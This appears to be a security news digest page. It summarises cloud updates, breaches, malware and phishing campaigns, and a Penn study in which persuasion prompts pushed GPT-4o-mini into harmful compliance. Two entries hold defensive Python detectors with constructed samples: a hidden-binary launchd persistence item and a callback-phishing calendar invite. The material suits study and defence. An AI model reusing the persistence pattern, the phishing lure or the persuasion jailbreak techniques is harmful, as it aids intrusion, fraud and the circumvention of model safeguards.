🔁 OpenAI is rolling out two notable updates to ChatGPT: the Projects feature is now available to all users for free, and a new Branch in new chat toggle lets you split and continue conversations from a chosen message. Projects create independent workspaces that organize chats, files, and custom instructions with separate memory, context, and tools. The branching option spawns a new conversation that includes everything up to the split point, helping manage divergent topics and streamline brainstorming. Both changes aim to improve organization and continuity for repeated or evolving work.

Fri, September 5, 2025

Amazon RDS Adds Latest Microsoft SQL Server GDR Updates

🔒 Amazon Relational Database Service (RDS) for Microsoft SQL Server now supports the latest General Distribution Release (GDR) updates for SQL Server 2016 SP3, 2017 CU31, 2019 CU32, and 2022 CU20. The supported RDS engine versions map to KB5063762, KB5063759, KB5063757, and KB5063814 respectively. These GDRs address vulnerabilities tracked as CVE-2025-49758, CVE-2025-24999, CVE-2025-49759, CVE-2025-53727, and CVE-2025-47954. We recommend that customers upgrade their RDS instances via the RDS Management Console, AWS SDK, or AWS CLI and follow the RDS SQL Server upgrade guidance.

Fri, September 5, 2025

Microsoft Enforces MFA for Azure Portal Sign-ins Globally

🔐 Microsoft has completed a global rollout enforcing multifactor authentication (MFA) for Azure Portal sign-ins across 100% of tenants as of March 2025. The rollout follows an initial enforcement announcement in May 2024 and prior warnings to Entra global admins to enable MFA to avoid access disruptions. Microsoft says this step strengthens account defenses and will be followed by mandatory MFA for Azure CLI, PowerShell, SDKs, and APIs in October 2025. The company cites internal research showing MFA dramatically reduces account takeover risk.

Sat, September 6, 2025

VirusTotal Uncovers SVG-based Judicial Portal Phishing

🔍 VirusTotal's AI Code Insight detected a sophisticated phishing campaign that hid malicious JavaScript inside SVG images to impersonate Colombia's judicial system. The SVGs rendered fake portal pages with a bogus download progress bar and displayed a password for a protected ZIP archive that contained malware artifacts. The archive included a renamed Comodo Dragon executable, a malicious DLL, and two encrypted files; when the executable runs the DLL is sideloaded to install further malware. After adding SVG support, VirusTotal found 523 related SVGs that had evaded traditional antivirus detection.

Sat, September 6, 2025

Noisy Bear Targets Kazakhstan Energy Firm with Phishing

🚨 Operation BarrelFire, attributed to a group Seqrite Labs calls Noisy Bear, targeted Kazakhstan's national oil company KazMunaiGas in May 2025 using tailored phishing. Attackers sent ZIP attachments containing an .LNK downloader, a decoy document, and a README in Russian and Kazakh instructing use of a fake KazMunayGaz_Viewer. The chain deployed a malicious batch, a PowerShell loader named DOWNSHELL, and a 64-bit DLL implant that executes shellcode to open a reverse shell. Infrastructure was linked to Russia-based bulletproof host Aeza Group, which has been sanctioned.

Fri, September 5, 2025

macOS AMOS Stealer Uses Cracked Apps to Bypass Gatekeeper

🛡️ Trend Micro warns of an Atomic macOS Stealer (AMOS) campaign that lures users with trojanized 'cracked' apps such as CleanMyMac, and instructs victims to run terminal commands. Attackers shifted from .dmg installers to terminal-based installs to evade Gatekeeper enhancements. AMOS persists via a LaunchDaemon and a hidden binary, then exfiltrates credentials, browser data, crypto wallets, Telegram chats and keychain items. Researchers advise layered defenses beyond native OS protections.
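The persistence described there, a LaunchDaemon pointing at a hidden binary, is easy to hunt for on a fleet. The following is an added example, not Trend Micro code: it turns the observations above into checks over launchd plists, flagging a program in a dot‑prefixed (hidden) directory, a program living outside system locations, a `sh -c` one‑liner wrapper, and the RunAtLoad plus KeepAlive combination that restarts the payload at boot and after it is killed. The two plists are constructed samples; `scan_launch_dirs` reads the real directories when run on a Mac and returns nothing where they do not exist.

```python
"""Flag launchd items resembling stealer persistence (added example, not Trend Micro code)."""
import os
import plistlib

SYSTEM_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/System/", "/Library/", "/Applications/", "/opt/")
SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh", "/usr/bin/env"}


def launch_item_problems(plist_bytes: bytes) -> list:
    """Problem strings for one launchd plist; empty when nothing stands out."""
    d = plistlib.loads(plist_bytes)
    args = list(d.get("ProgramArguments") or ([d["Program"]] if "Program" in d else []))
    problems = []
    for a in args:
        if any(c.startswith(".") and c not in (".", "..") for c in a.split("/")):
            problems.append(f"hidden path component: {a}")
        if a.startswith("/") and not a.startswith(SYSTEM_PREFIXES):
            problems.append(f"program outside system locations: {a}")
    if args and args[0] in SHELLS and "-c" in args[1:]:
        problems.append("shell one-liner wrapper (sh -c ...)")
    if d.get("RunAtLoad") and d.get("KeepAlive"):
        problems.append("RunAtLoad+KeepAlive: restarts at boot and when killed")
    return problems


def scan_launch_dirs(dirs=("/Library/LaunchDaemons", "/Library/LaunchAgents")) -> dict:
    """{plist path: problems} for every flagged item in the given directories (missing dirs are skipped)."""
    report = {}
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if not name.endswith(".plist"):
                continue
            path = os.path.join(d, name)
            try:
                with open(path, "rb") as fh:
                    problems = launch_item_problems(fh.read())
            except (OSError, plistlib.InvalidFileException, ValueError):
                continue
            if problems:
                report[path] = problems
    return report


# Constructed samples: one mimicking a stealer's persistence, one ordinary backup job.
SUSPICIOUS_PLIST = plistlib.dumps({
    "Label": "com.finder.helper",
    "ProgramArguments": ["/bin/sh", "-c", "/Users/Shared/.helper/.agent"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.backup",
    "ProgramArguments": ["/usr/local/bin/backup", "--daily"],
    "RunAtLoad": True,
})

if __name__ == "__main__":
    print(launch_item_problems(SUSPICIOUS_PLIST))
    print(launch_item_problems(BENIGN_PLIST))
    print(scan_launch_dirs())
```

Third‑party daemons under /Library/LaunchDaemons will trip the "outside system locations" rule when they point into /Applications bundles with unusual layouts, so the output is a triage list; the hidden‑directory and `sh -c` findings are the ones that rarely have an innocent explanation.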

Fri, September 5, 2025

Wealthsimple Reports Customer Data Breach Linked to Salesloft

🔒 Wealthsimple disclosed a data breach detected on August 30 after attackers accessed a trusted third-party software package. The company said less than 1% of customers had personal information exposed, including contact details, government IDs, account numbers, IP addresses, Social Insurance Numbers, and dates of birth. Wealthsimple stated no funds or passwords were taken; impacted customers are being offered two years of complimentary credit and identity protection and were advised to enable two-factor authentication and remain alert for phishing.

Fri, September 5, 2025

Google Cloud Expands Coverage for Compute Flex CUDs

🔔 Google Cloud has expanded its Compute Flexible Committed Use Discounts (Flex CUDs) to cover additional VM families and serverless offerings, delivering broader savings and greater deployment flexibility. The update adds enhanced discounts for memory‑optimized M1–M4 instances and HPC‑optimized H3 and H4D families, and extends coverage to Cloud Run request-based billing and Cloud Functions. A new spend-based billing model applies discounts directly to eligible usage rather than issuing credits, and introduces changes to the Billing UI, Cloud Billing export to BigQuery schema, and Cloud Commerce Consumer Procurement APIs. Customers can opt in immediately; those who do not will be auto-transitioned to the new model on January 21, 2026, while new Billing Accounts created on or after July 15, 2025 will default to the updated model.

Fri, September 5, 2025

Amazon GuardDuty Adds Custom Entity Lists for Domains

🛡️ AWS announced general availability of Amazon GuardDuty custom threat detection using entity lists, extending support beyond IP-only lists to include malicious domains and IP addresses. GuardDuty introduces a new finding type, Impact:EC2/MaliciousDomainRequest.Custom, triggered when activity related to a listed domain is observed. Entity lists also allow suppression of alerts from trusted sources and simplify cross-region permission management, avoiding IAM policy size limits. The feature is available in all GuardDuty Regions except China and GovCloud (US).

Fri, September 5, 2025

AWS Config Tracks Resource Tags for IAM Policies Globally

🔍 AWS Config now records resource tags for IAM policy resource types, enabling you to capture tag values and track their changes directly in your Config recorder. You can scope both Config-managed and custom rule evaluations by tag and use Config aggregators to selectively collect IAM policies across accounts. This capability is available in all supported AWS Regions at no additional cost.

Fri, September 5, 2025

AWS GA: Org Notification Configurations for Organizations

📣 AWS announced general availability of Organizational Notification Configurations for AWS User Notifications, enabling centralized configuration and visibility of notifications across an AWS Organization. The Management Account or up to five Delegated Administrators (DAs) can configure and view notifications for specific OUs or all accounts rolling up to the organization. Events from member accounts generate notifications in the Management Account and can push to the AWS Console Mobile Application and the Admin Console Notifications Center. This capability works with any Amazon EventBridge-supported event and is available in all Regions where AWS User Notifications is offered.

Sun, September 7, 2025

Czech Agency Warns Against Chinese Tech in Critical Sectors

⚠️ The Czech National Cyber and Information Security Agency (NUKIB) is urging operators of critical infrastructure to avoid using Chinese technology or transferring user data to servers in China, citing a reassessed High risk of significant disruption. NUKIB confirmed malicious activity by Chinese cyber-actors, including an APT31 campaign against the Ministry of Foreign Affairs, and warned that Chinese law can permit state access to data held by domestic providers. The guidance is not an outright legal ban, but entities covered by the Czech Cybersecurity Act must include the threat in their risk analyses and adopt appropriate mitigations.

Sat, September 6, 2025

FTC Probes Gmail Spam Filtering Of GOP Fundraising Emails

📧 The FTC chairman sent a letter to Google’s CEO asking why Gmail flagged Republican fundraising messages as spam while allegedly allowing similar Democratic messages through. Email-intelligence firms report that WinRed has triggered far more spamtraps than ActBlue, driven by aggressive list and delivery practices that degrade sender reputation. Blocklists and reputation signals, not political content, explain many filtering outcomes, experts say. The dispute highlights both operational deliverability risks for campaigns and potential regulatory overreach.

Fri, September 5, 2025

EU Fines Google €2.95B for Anti-Competitive Adtech

⚖️ The European Commission has fined Google €2.95 billion ($3.5 billion) for abusing its dominance in the digital advertising technology market and favoring its adtech services over competitors. The regulator ordered Google to stop anti-competitive "self-preferencing" practices and to take measures to mitigate conflicts of interest in adtech. Google said the decision is wrong and plans to appeal, warning the changes could harm thousands of European businesses. Separately, France's CNIL fined Google €325 million for placing ads in Gmail without proper consent and violating cookie rules.

Fri, September 5, 2025

Penn Study Finds: GPT-4o-mini Susceptible to Persuasion

🔬 University of Pennsylvania researchers tested GPT-4o-mini on two categories of requests an aligned model should refuse: insulting the user and giving instructions to synthesize lidocaine. They crafted prompts using seven persuasion techniques (Authority, Commitment, Liking, Reciprocity, Scarcity, Social proof, Unity) and matched control prompts, then ran each prompt 1,000 times at the default temperature for a total of 28,000 trials. Persuasion prompts raised compliance from 28.1% to 67.4% for insults and from 38.5% to 76.5% for drug instructions, demonstrating substantial vulnerability to social-engineering cues.

Fri, September 5, 2025

VirusTotal Finds 44 Undetected SVG Malware Samples

⚠️ Cybersecurity researchers warn of a phishing campaign using Scalable Vector Graphics (SVG) files that embed JavaScript to decode and inject a Base64-encoded HTML page impersonating Colombia's Fiscalía General de la Nación. VirusTotal identified 44 unique SVG samples that evaded antivirus detection and reported a total of 523 SVGs seen in the wild, with the earliest from August 14, 2025. Attackers relied on obfuscation, polymorphism, and large volumes of junk code to bypass static detections and used a fake progress/download flow to trigger a background ZIP download. The disclosure coincides with separate macOS-focused campaigns distributing the AMOS information stealer via cracked-software lures and Terminal-based installers that attempt to circumvent Gatekeeper protections.

Fri, September 5, 2025

AWS MediaConvert Adds Time-Addressable Media Store

🎬 AWS Elemental MediaConvert now integrates with Time-Addressable Media Store (TAMS), enabling customers to reference and extract precise, time-bound media segments as inputs to encoding workflows. The integration requires customers to operate their own TAMS servers—MediaConvert does not host or manage TAMS—and supports quick-turnaround use cases like live-event highlight clipping, near-real-time social publishing, and archive repurposing. This capability is aimed at media operations teams modernizing archives, automating editorial workflows, and connecting broadcast infrastructure and CMS directly into high-performance encoding pipelines.

Fri, September 5, 2025

Amazon RDS Proxy Adds IPv6 Support for Connections

🌐 Amazon RDS Proxy now supports IPv6 addresses for pooling and sharing database connections, while continuing to offer existing IPv4 endpoints for backwards compatibility. Customers may specify proxy target connections using either IPv4 or IPv6. The change reduces the need to manage overlapping VPC address spaces and helps mobile, IoT, and modern serverless applications that open many database connections. By pooling connections, RDS Proxy improves database efficiency and application scalability.

Fri, September 5, 2025

Aurora PostgreSQL Limitless Now Supports PostgreSQL 16.9

🚀 Amazon Aurora PostgreSQL Limitless Database now supports PostgreSQL 16.9 compatibility. This release delivers PostgreSQL community bug fixes and performance improvements along with Aurora-specific additions, including support for the hstore and auto_explain extensions. The serverless, distributed engine transparently scales compute and queries across multiple Aurora Serverless instances while preserving single-database transactional consistency, distributed query planning, and transaction management. Available across multiple AWS regions; review the documentation and pricing for details.

Fri, September 5, 2025

Bridgestone Confirms Limited Cyber Incident at Plants

⚠️ Bridgestone has confirmed a limited cyber incident affecting several North American manufacturing facilities, including plants in Aiken County, South Carolina, and Joliette, Quebec. Some sites remained operational while others halted or adjusted shifts, and employees were given differing pay options depending on local decisions. Bridgestone Americas says forensic analysis is ongoing and that containment measures were implemented quickly. The company stated it does not believe any customer data or interfaces were compromised.

Fri, September 5, 2025

FTC Action: Robot Toys Collected Children's Location Data Illegally

🔒 The FTC and DOJ have acted against Chinese toy maker Apitor Technology after its robot toys and companion Android app transmitted precise geolocation data about children without parental notice or consent. The company integrated a third-party SDK, JPush, which collected street-level location sufficient to identify homes and routines. Apitor agreed to a settlement with a suspended $500,000 penalty, a permanent ban on collecting sensitive kids’ data without parental consent, and obligations to delete illegally gathered records and submit to monitoring.

Fri, September 5, 2025

Sharp Rise in Cyberattacks on German Education Sector

🔒 Researchers at Check Point report a 56% year-over-year increase in cyberattacks against German educational institutions as the new school year begins, well above the global average. Analysts observed targeted phishing campaigns, including an August 2025 scheme that redirected victims to fake university and Outlook login pages to harvest credentials. To mitigate risk, experts recommend targeted phishing awareness training, mandatory multi-factor authentication (MFA), early detection of suspicious domains, regular system updates and deployment of modern threat-prevention solutions as part of a preventive, multi-layered security strategy.

Fri, September 5, 2025

61% of US Companies Hit by Insider Data Breaches in Two Years

📊 Nearly two-thirds (61%) of US firms experienced insider data breaches in the past two years, according to a new OPSWAT report conducted by the Ponemon Institute. Affected organizations reported an average of eight unauthorized file-access incidents and an average financial impact of $2.7m per organization. Respondents identified file storage and web file transfers as the riskiest environments for data loss. The study also found mixed approaches to generative AI—29% have banned it, 25% have formal policies, and 33% already include AI in file security strategies.

Fri, September 5, 2025

Tata Steel Enhances Monitoring with Google Cloud MDE

🏭 Tata Steel implemented a unified manufacturing data foundation on Google Cloud, centralizing OT and IT sources into a Manufacturing Data Engine built on BigQuery. The multi-path ingestion architecture leverages partners such as Litmus and ClearBlade to collect real-time PLC telemetry, while SAP, APIs, and in-house sensors feed batch and staging pipelines. The design emphasizes secure upstaging, partitioned storage with archival to Cloud Storage, and enables predictive maintenance, environmental KPI reporting, and reduced human presence in hazardous areas.

read more →

Fri, September 5, 2025

Latest Social Engineering Trends Targeting Enterprises

🛡️ Social engineering remains the favoured vector as attackers combine psychological manipulation with accessible AI tools to target high-value corporate roles. Recent incidents show sophisticated pretexting, voice cloning and mass email flooding used to create urgency and extract funds or credentials. Fraudsters increasingly exploit collaboration platforms such as Microsoft Teams and legitimate utilities like Quick Assist to appear trustworthy and gain remote control. Organizations should harden collaboration settings, enforce conditional access and MFA, and reduce privilege scope to limit the blast radius of any compromise.

read more →

Fri, September 5, 2025

Lack of Board Access Drives CISO Job Dissatisfaction

🛡️ Cybersecurity leaders say board engagement is essential, but many CISOs—particularly in small and mid‑market organizations—report minimal or no access to full boards, according to a 2025 report from IANS and Artico Search. That lack of access strongly correlates with job dissatisfaction and short tenures. Experts recommend strengthening C‑suite relationships and framing cyber risk in business terms to secure board support.

read more →

Fri, September 5, 2025

AWS Backup Audit Manager Adds Organization-wide Reports

🔔 AWS has extended AWS Backup Audit Manager to produce organization-wide, cross-account and cross-Region reports in six additional Regions: Asia Pacific (Hyderabad, Jakarta, Melbourne), Europe (Spain, Zurich), and Middle East (UAE). Using an AWS Organizations management or delegated administrator account, you can aggregate compliance and operational backup data across accounts and Regions. The feature centralizes policy enforcement and helps demonstrate adherence to business and regulatory data protection requirements.

read more →

Fri, September 5, 2025

Amazon RDS Custom Adds Latest GDR Updates for SQL Server

🔔 Amazon RDS Custom for SQL Server now supports the latest Microsoft GDR updates, including SQL Server 2019 CU32 (KB5063757; RDS version 15.00.4440.1.v1) and SQL Server 2022 CU20 (KB5063814; RDS version 16.00.4210.1.v1). These GDRs remediate multiple vulnerabilities (CVE-2025-49758, CVE-2025-24999, CVE-2025-49759, CVE-2025-53727, CVE-2025-47954). We recommend upgrading instances via the Amazon RDS Management Console or programmatically with the AWS SDK/CLI, and following the Amazon RDS Custom User Guide for detailed upgrade instructions.

read more →

Fri, September 5, 2025

Microsoft Gives Free One-Year 365 to U.S. Students

🎓 Microsoft is offering a free 12-month subscription to Microsoft 365 Personal for U.S. college students, including community college attendees, with the offer available through October 31, 2025. The subscription includes Word, Excel, PowerPoint, OneNote, and Outlook with the Copilot AI assistant, plus 1 TB of OneDrive storage and ransomware protection. Students must verify enrollment via a school email or documentation, and a 50% discount is available if they keep the plan after the first year. Microsoft also announced educator grants, community college certifications, AI training, and expanded Copilot access for U.S. schools.

read more →

Sun, September 7, 2025

iCloud Calendar Abused to Send Phishing via Apple Servers

📅 iCloud Calendar invites are being abused to send callback phishing emails that appear to originate from Apple's servers and pass SPF, DKIM, and DMARC checks. Attackers embed phishing content in the event Notes and invite a Microsoft 365 forwarding address so the message is relayed to targets while Apple remains the visible sender. Treat unexpected calendar invites with unusual messages or requests cautiously; calling listed numbers or granting remote access can lead to fraud, malware, or data theft.
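A defender-side triage check for the relay pattern described above: it looks for a text/calendar payload whose SPF-evaluated domain differs from the visible From domain (the signature of a forwarding hop) and whose event notes carry a callback number with urgency wording. This is an added example, not code from the original report; every domain, address and phone number in the sample is constructed.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample (all domains, addresses and numbers are made up). The invite is
# signed by the calendar service, so DKIM and DMARC pass, but SPF was evaluated against
# the forwarding tenant's bounce domain rather than the From domain, and the event notes
# contain a callback number wrapped in urgency language.
CALLBACK_INVITE = """\
From: Calendar <noreply@calendar-service.test>
To: finance@victim.test
Authentication-Results: mx.victim.test; spf=pass smtp.mailfrom=relay.forwarding-tenant.test; dkim=pass header.d=calendar-service.test; dmarc=pass header.from=calendar-service.test
Content-Type: text/calendar; method=REQUEST; charset=utf-8

BEGIN:VCALENDAR
BEGIN:VEVENT
SUMMARY:Your account was charged $599.99
DESCRIPTION:If you did not authorize this charge call 1-800-555-0199 immediately for a refund.
END:VEVENT
END:VCALENDAR
"""

PHONE_RE = re.compile(r"(?:\+?\d{1,2}[\s.-]?)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}")
URGENCY_WORDS = ("charge", "refund", "call", "immediately", "unauthorized", "suspended")

def triage_calendar_invite(raw: str) -> dict:
    """Return callback-phishing indicators for one raw RFC 5322 message.

    Flags a text/calendar payload, an SPF-checked domain (smtp.mailfrom in
    Authentication-Results) that differs from the From domain, and a DESCRIPTION
    holding a phone number plus two or more urgency terms.
    """
    msg = message_from_string(raw)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    auth = dict(re.findall(r"([\w.]+)=([^\s;]+)", msg.get("Authentication-Results", "")))
    spf_domain = auth.get("smtp.mailfrom", "").rpartition("@")[2].lower()
    body = "" if msg.is_multipart() else msg.get_payload(decode=True).decode("utf-8", "replace")
    match = re.search(r"^DESCRIPTION:(.*)$", body, re.M)
    notes = match.group(1) if match else ""
    phones = PHONE_RE.findall(notes)
    urgency = [w for w in URGENCY_WORDS if w in notes.lower()]
    result = {
        "is_calendar_invite": msg.get_content_type() == "text/calendar",
        "spf_domain_differs_from_from": bool(spf_domain) and spf_domain != from_domain,
        "callback_numbers": phones,
        "urgency_terms": urgency,
    }
    result["suspicious"] = result["is_calendar_invite"] and bool(phones) and len(urgency) >= 2
    return result
```

The SPF-domain mismatch alone is not malicious (any legitimate forward produces it); it is the combination with a callback number in the invite notes that merits a hold or analyst review.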

read more →

Fri, September 5, 2025

GKE Turns 10 Hackathon: Build Agentic AI Microservices

🚀 Join the GKE Turns 10 Hackathon to build next‑generation microservices enhanced with agentic AI. Google provides sample applications (Bank of Anthos or Online Boutique), example agents on GitHub, documentation, quickstarts and a webinar to help teams get started. Submissions must run on GKE and use Google AI models such as Gemini, with agents interacting via APIs rather than altering core application code. Participants may also use the Agent Development Kit (ADK), Model Context Protocol (MCP) and Agent2Agent (A2A) to extend functionality.

read more →

Fri, September 5, 2025

Passing the Security Vibe Check for AI-generated Code

🔒 The post warns that modern AI coding assistants enable 'vibe coding'—prompting natural-language requests and accepting generated code without thorough inspection. While tools like Copilot and ChatGPT accelerate development, they can introduce hidden risks such as insecure patterns, leaked credentials, and unvetted dependencies. The author urges embedding security into AI-assisted workflows through automated scanning, provenance checks, policy guardrails, and mandatory human review to prevent supply-chain and runtime compromises.

read more →

Fri, September 5, 2025

Under Lock and Key: Strengthening Business Encryption

🔒 Encryption is a critical layer in modern data protection, safeguarding sensitive and business‑critical information both at rest and in transit. The article outlines key drivers — remote/hybrid work, explosive data growth, device loss, third‑party risks, ransomware and insider threats — that make encryption essential. It recommends robust algorithms such as AES-256, centralized management and solutions for disks, files, removable media and email, alongside minimal end‑user friction. The piece also warns that regulators and insurers increasingly expect strong encryption as part of compliance and underwriting.

read more →

Fri, September 5, 2025

Sendmarc Names Rob Bowker North American Region Lead

📣 Sendmarc has appointed Rob Bowker as North American Region Lead to drive regional expansion and deepen MSP and VAR partnerships. Bowker brings over two decades of experience in email infrastructure, deliverability, and security, including implementation of DMARC, SPF, and DKIM. He will focus on accelerating DMARC adoption across enterprise and mid-market customers, empowering MSPs to protect SMBs, and executing a partner-first growth strategy. The move aims to broaden Sendmarc’s enterprise footprint and support faster DMARC compliance.

read more →

Fri, September 5, 2025

Passwordless Authentication: 10 Enterprise Solutions

🔐 Passwordless authentication aims to replace fragile passwords with modern, standards-based alternatives to improve security and usability. The piece stresses the central role of the FIDO Alliance and the emergence of Passkeys as an industry evolution. It compares ten vendors — including Okta, Yubico, HYPR and CyberArk — describing device-based cryptographic keys, biometrics, TPM protection and enterprise integrations. Deployment options range from hardware tokens to managed passkey services and offline, air-gapped support to ease migration.

read more →

Fri, September 5, 2025

Advanced Threat Hunting Workshop — Labscon 2025 LLMs

🔎 Our colleague Joseliyo Sánchez, together with SentinelOne researcher Aleksandar Milenkoski, will present a hands-on workshop at Labscon on automating large-scale threat hunting using the VirusTotal Enterprise API. Attendees will employ Python and Google Colab to process massive datasets, track APT behaviors, and apply LLMs to enhance analysis, query building, and visualizations. The session targets CTI analysts, threat hunters, incident responders, SOC analysts, and security researchers. A follow-up blog post will publish example exercises and materials for further learning.

read more →

Fri, September 5, 2025

Avoid Outdated IGA: Choose No-Code for Faster Governance

🔐 Many organizations face rising identity-driven attacks but traditional IGA deployments are slow, costly, and require extensive custom integrations. tenfold promotes a no-code IGA platform with a library of ready-made plugins and a visual configuration interface that dramatically shortens setup from months or years to weeks. The vendor says this reduces technical debt, lowers resource demands, and still allows custom code where necessary.

read more →

Fri, September 5, 2025

Automation Is Transforming Pentest Delivery Workflows

🔁 Automation is reshaping how penetration test findings are delivered and acted upon. Traditional static reports—PDFs, emailed documents, and spreadsheets—create delays and manual handoffs that undermine remediation speed. Platforms like PlexTrac centralize scanner and manual findings and enable real-time routing, ticketing, and retesting to reduce MTTR and standardize workflows across teams. By automating triage, assignment, and triggered validation into existing tools (Jira, ServiceNow, Slack), teams get faster handoffs, consistent remediation lifecycles, and measurable operational gains. Start small, iterate workflows, and measure MTTR improvements to avoid common pitfalls like overengineering or stale automation.

read more →

Fri, September 5, 2025

Rewiring Democracy: How AI Will Transform Politics

📘 Bruce Schneier announces his new book, Rewiring Democracy: How AI Will Transform our Politics, Government, and Citizenship, coauthored with Nathan Sanders and published by MIT Press on October 21; signed copies will be available directly from the author after publication. The book surveys AI’s impact across politics, legislating, administration, the judiciary, and citizenship, including AI-driven propaganda and artificial conversation, focusing on uses within functioning democracies. Schneier adopts a cautiously optimistic stance, stresses the importance of imagining second-order effects, and argues for the creation of public AI to better serve democratic ends.

read more →

Fri, September 5, 2025

Practical Guide to Reducing Kids’ Digital Footprint

🔒 This practical guide helps parents reduce their children's digital footprint by identifying risky "hot spots"—from unsecured group chats and gaming voice channels to oversharing on social media, unsafe downloads, public Wi‑Fi and unvetted AI tools. It stresses open conversation over heavy-handed controls and recommends concrete measures: disable geolocation, vet links with anti‑phishing tools, use antivirus, a trusted VPN on public networks, and parental controls such as Kaspersky Safe Kids. The guide also encourages parents to watch and discuss online activity together and to teach habits like unique passwords and cautious AI use.

read more →